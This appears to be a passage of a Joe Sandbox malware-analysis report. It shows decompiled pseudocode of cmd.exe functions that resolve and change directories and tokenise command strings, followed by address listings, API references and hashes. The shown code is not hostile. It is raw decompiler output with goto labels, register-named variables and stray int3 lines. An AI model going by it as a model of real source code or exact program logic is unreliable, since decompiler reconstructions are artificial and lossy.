				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E011E0D51(_t177 - 0x244);
					if(E011E0C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E011E0DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E011DDF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E011E0DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0x11fd0b4);
									L011E82BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E011E0DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0x11fd0b4);
										L011E82BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E011E6CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0x1213cc9 == 0) {
													L32:
													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E011E3A50(_t177 - 0x28, _t170) != 0) {
																E011E0DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x11fd0b4);
																L011E82BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0x1213cb8;
																if( *0x1213cb8 == 0) {
																	_t158 = 0x1213ab0;
																}
																E011E36CB(_t135, _t158,  *0x1213cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E011E0DE8(E011E36AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E011E0DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0x11fd0b4);
															L011E82BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E011E0DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x11fd0b4);
																L011E82BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E011E245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E011E7614(_t135, _t173, _t175);
			}



























                                    0x011e33fc
                                    0x011e33fc
                                    0x011e33fc
                                    0x011e3401
                                    0x011e3406
                                    0x011e340b
                                    0x011e3411
                                    0x011e3415
                                    0x011e3419
                                    0x011edc11
                                    0x00000000
                                    0x011edc17
                                    0x011edc17
                                    0x011e341f
                                    0x011e341f
                                    0x011e3425
                                    0x011e344b
                                    0x011edc21
                                    0x011edc27
                                    0x00000000
                                    0x011e3451
                                    0x011e3458
                                    0x011e345a
                                    0x011e3462
                                    0x00000000
                                    0x011e3468
                                    0x011e346a
                                    0x011e346d
                                    0x011e346f
                                    0x011e346f
                                    0x011e3472
                                    0x011e3472
                                    0x011e3475
                                    0x011e3478
                                    0x011e3481
                                    0x011e3484
                                    0x011e3486
                                    0x011e3486
                                    0x011e348e
                                    0x00000000
                                    0x00000000
                                    0x011e3490
                                    0x011e3490
                                    0x011e3497
                                    0x011edc76
                                    0x00000000
                                    0x011edc76
                                    0x00000000
                                    0x011e3497
                                    0x011e349f
                                    0x011e34a2
                                    0x011e34a7
                                    0x011edc7d
                                    0x011edc7d
                                    0x011e34b1
                                    0x011e34b7
                                    0x011e34bc
                                    0x011edc88
                                    0x011edc88
                                    0x011e34cd
                                    0x011e34d2
                                    0x011e34d3
                                    0x011e34db
                                    0x011e34e4
                                    0x011e34e7
                                    0x011edc93
                                    0x011e34f7
                                    0x011e3502
                                    0x011e3502
                                    0x011e3506
                                    0x011e350c
                                    0x011e3510
                                    0x011e3515
                                    0x011edc9c
                                    0x011edc9c
                                    0x011e3527
                                    0x011e352f
                                    0x011edca7
                                    0x011edcad
                                    0x00000000
                                    0x011e3535
                                    0x011e3538
                                    0x011edcd9
                                    0x011edcdf
                                    0x011edce4
                                    0x011edce9
                                    0x011edcea
                                    0x011edcef
                                    0x011e353e
                                    0x011e353e
                                    0x011e3543
                                    0x011e3545
                                    0x011edd01
                                    0x011edd01
                                    0x011e3550
                                    0x011edc50
                                    0x011edc56
                                    0x011edc5b
                                    0x011edc60
                                    0x011edc61
                                    0x011edc66
                                    0x011edc6e
                                    0x00000000
                                    0x011e3556
                                    0x011e355a
                                    0x011edd0c
                                    0x011edd0c
                                    0x011e3564
                                    0x00000000
                                    0x011e356a
                                    0x011e356c
                                    0x011e356e
                                    0x011edd17
                                    0x011edd17
                                    0x011e3574
                                    0x011e3577
                                    0x011e3577
                                    0x011e357a
                                    0x011e357d
                                    0x011e3585
                                    0x011e3589
                                    0x011edd22
                                    0x011edd22
                                    0x011e358f
                                    0x011e3592
                                    0x011e3592
                                    0x011e3594
                                    0x011e35aa
                                    0x00000000
                                    0x00000000
                                    0x011e35ae
                                    0x011e35b3
                                    0x011e36a4
                                    0x00000000
                                    0x011e36a4
                                    0x00000000
                                    0x011e35b3
                                    0x011e35bb
                                    0x011e35be
                                    0x011e35c3
                                    0x011edd2d
                                    0x011edd2d
                                    0x011e35d3
                                    0x011edd3e
                                    0x011edd43
                                    0x00000000
                                    0x011edd52
                                    0x011edd55
                                    0x00000000
                                    0x011edd5b
                                    0x00000000
                                    0x011edd5b
                                    0x011edd55
                                    0x011e35d9
                                    0x011e35d9
                                    0x011e35e0
                                    0x011e3600
                                    0x011e3600
                                    0x011e3609
                                    0x011e3631
                                    0x011e3633
                                    0x011e3640
                                    0x011e3645
                                    0x011e36b4
                                    0x011e36b4
                                    0x011e3650
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e3656
                                    0x011e3656
                                    0x011e3656
                                    0x011e365b
                                    0x011e36bc
                                    0x011e36bc
                                    0x011e3667
                                    0x011edc34
                                    0x011edc39
                                    0x011edc3e
                                    0x011edc3f
                                    0x011edc44
                                    0x011edc4c
                                    0x011edc4c
                                    0x011edc70
                                    0x011e366d
                                    0x011e366d
                                    0x011e3675
                                    0x011e36c4
                                    0x011e36c4
                                    0x011e3680
                                    0x011e3685
                                    0x011e3697
                                    0x011e369c
                                    0x011e3667
                                    0x011e360b
                                    0x011e360b
                                    0x011e3610
                                    0x011edd6b
                                    0x011edd6b
                                    0x011e3617
                                    0x011e3620
                                    0x011edd76
                                    0x011edd7c
                                    0x011edd81
                                    0x011edcb3
                                    0x011edcb3
                                    0x011edcb4
                                    0x011edcba
                                    0x011edcbf
                                    0x011edcc4
                                    0x011edcc5
                                    0x011edcca
                                    0x011e3626
                                    0x011e362b
                                    0x011edd92
                                    0x011edd97
                                    0x011edd9c
                                    0x011edd9d
                                    0x011edda2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e362b
                                    0x011e3620
                                    0x011e35e2
                                    0x011e35e2
                                    0x011e35e7
                                    0x011edd60
                                    0x011edd60
                                    0x011e35fa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e35fa
                                    0x011e35e0
                                    0x011e35d3
                                    0x011e3564
                                    0x011e3550
                                    0x011e3538
                                    0x011e352f
                                    0x011e3462
                                    0x011e344b
                                    0x011e36a3

                                    APIs
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?,?,?,?,?), ref: 011E34B1
                                    • towupper.MSVCRT ref: 011E34C6
                                    • iswalpha.MSVCRT ref: 011E34DB
                                    • towupper.MSVCRT ref: 011E34FB
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 011E3527
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E35CA
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E3617
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 011E3648
                                    • _local_unwind4.MSVCRT ref: 011EDC44
                                    • _local_unwind4.MSVCRT ref: 011EDC66
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                    • String ID:
                                    • API String ID: 2497804757-0
                                    • Opcode ID: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction ID: 53e1ceb35c4a0677ef4ab30f813ccce29622c1e74c3a517601df7f046761f210
                                    • Opcode Fuzzy Hash: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction Fuzzy Hash: F7B1E130E109169ADF2CEBE8E84CAFDB7F4FF14200F454569E52AD3290EB719A80CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DEA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E011DEA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x11fd0b4; // 0x2833377e
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E011E00B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E011F9287(4);
						__imp__longjmp(0x120b8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E011E00B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E011F9287(_t139);
						__imp__longjmp(0x120b8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E011E711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E011DE9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E011DD7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E011DD7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E011E0100(_t145, 4 + _t180 * 2) == 0) {
								E011F9287(_t145);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E011E00B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E011F9287(_t148);
									__imp__longjmp(0x120b8b8, 1);
									asm("int3");
									__eflags =  *0x120fa90;
									if( *0x120fa90 != 0) {
										E011F82EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x120fa88;
									 *0x11fd5c8 = 0;
									if( *0x120fa88 != 0) {
										E011F8121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E011E1040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x120faa0 - _t113;
										__eflags = 0x120faa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E011DEEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E011DF030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x120fa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E011E02B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E011DF300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E011E6FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}














































































                                    0x011dea40
                                    0x011dea40
                                    0x011dea4b
                                    0x011dea52
                                    0x011dea57
                                    0x011dea59
                                    0x011dea5e
                                    0x011ded52
                                    0x011ded57
                                    0x011ded5c
                                    0x011ded5e
                                    0x00000000
                                    0x011ded64
                                    0x011ec03d
                                    0x011ec049
                                    0x00000000
                                    0x011ec049
                                    0x011dea64
                                    0x011dea64
                                    0x011dea64
                                    0x011dea67
                                    0x011dea67
                                    0x011dea6a
                                    0x011dea6d
                                    0x011dea76
                                    0x011dea7d
                                    0x011dea82
                                    0x011dea8a
                                    0x011ec04f
                                    0x011ec04f
                                    0x011ec05b
                                    0x00000000
                                    0x011dea90
                                    0x011dea90
                                    0x011dea96
                                    0x011dea9b
                                    0x011dea9d
                                    0x011deaa3
                                    0x011deaa3
                                    0x011deaa6
                                    0x011deaaf
                                    0x00000000
                                    0x00000000
                                    0x011deab3
                                    0x011dead0
                                    0x011dead0
                                    0x011dead8
                                    0x011dead9
                                    0x011deab5
                                    0x011deab7
                                    0x011deabd
                                    0x011deac2
                                    0x011deac8
                                    0x011deaca
                                    0x00000000
                                    0x011deaca
                                    0x011deac8
                                    0x011deadf
                                    0x011deae5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deae5
                                    0x011deae7
                                    0x011deaed
                                    0x011deaf4
                                    0x011ded75
                                    0x011ded7a
                                    0x011ded7b
                                    0x011ded7c
                                    0x011ded7d
                                    0x011ded7e
                                    0x011ded7f
                                    0x011ded82
                                    0x011ded88
                                    0x011ded89
                                    0x011ded8d
                                    0x011ded94
                                    0x011ded95
                                    0x011ded97
                                    0x011ded9f
                                    0x011deda1
                                    0x00000000
                                    0x011deafa
                                    0x011deafc
                                    0x011deb06
                                    0x011deb0e
                                    0x011deb11
                                    0x011deb1e
                                    0x011deb24
                                    0x011deb26
                                    0x011deb2a
                                    0x011deb5a
                                    0x011deb5a
                                    0x011deb66
                                    0x011deb7e
                                    0x011deb81
                                    0x011deb84
                                    0x011deb8b
                                    0x011decf0
                                    0x011decf0
                                    0x011decf4
                                    0x011decf6
                                    0x011decf9
                                    0x011decfc
                                    0x011decff
                                    0x011ded02
                                    0x011ded05
                                    0x00000000
                                    0x00000000
                                    0x011ded07
                                    0x011ded0a
                                    0x00000000
                                    0x011ded10
                                    0x011ded10
                                    0x011ded15
                                    0x00000000
                                    0x011ded17
                                    0x00000000
                                    0x011ded17
                                    0x011ded15
                                    0x00000000
                                    0x011ded0a
                                    0x011ded6e
                                    0x011ded6e
                                    0x011deb91
                                    0x011deb91
                                    0x011deb68
                                    0x011deb6d
                                    0x011deb73
                                    0x011deb78
                                    0x011deccd
                                    0x011decd0
                                    0x011decd2
                                    0x011ded1c
                                    0x011ded23
                                    0x011ded26
                                    0x011ded69
                                    0x011ded69
                                    0x011ded28
                                    0x011ded2e
                                    0x011ded38
                                    0x011decd4
                                    0x011decd4
                                    0x011decd6
                                    0x011ec092
                                    0x011ec092
                                    0x011decdc
                                    0x011dece6
                                    0x011dece6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011deb78
                                    0x011deb9b
                                    0x011deb9f
                                    0x011deba2
                                    0x011deba7
                                    0x00000000
                                    0x00000000
                                    0x011deb2c
                                    0x011deb2d
                                    0x011deb33
                                    0x011deb38
                                    0x011debde
                                    0x011debde
                                    0x011debe1
                                    0x011debe3
                                    0x011ded40
                                    0x011ded47
                                    0x00000000
                                    0x011ded4d
                                    0x00000000
                                    0x011ded4d
                                    0x011debe9
                                    0x011debe9
                                    0x011debe9
                                    0x011debe9
                                    0x011debec
                                    0x011debf2
                                    0x011dec0e
                                    0x011dec11
                                    0x011dec11
                                    0x011dec14
                                    0x011dec1a
                                    0x011ec061
                                    0x011ec066
                                    0x011ec06b
                                    0x011ec06d
                                    0x00000000
                                    0x011ec073
                                    0x00000000
                                    0x011ec073
                                    0x011dec20
                                    0x011dec20
                                    0x011dec20
                                    0x011dec23
                                    0x011dec26
                                    0x011dec28
                                    0x011dec30
                                    0x011dec30
                                    0x011dec34
                                    0x00000000
                                    0x00000000
                                    0x011dec37
                                    0x011dec3d
                                    0x011dec40
                                    0x011dec42
                                    0x011dec8a
                                    0x011dec8a
                                    0x011dec91
                                    0x011deca9
                                    0x011deca9
                                    0x011decb0
                                    0x011ec07d
                                    0x011ec082
                                    0x011ec084
                                    0x00000000
                                    0x011ec08a
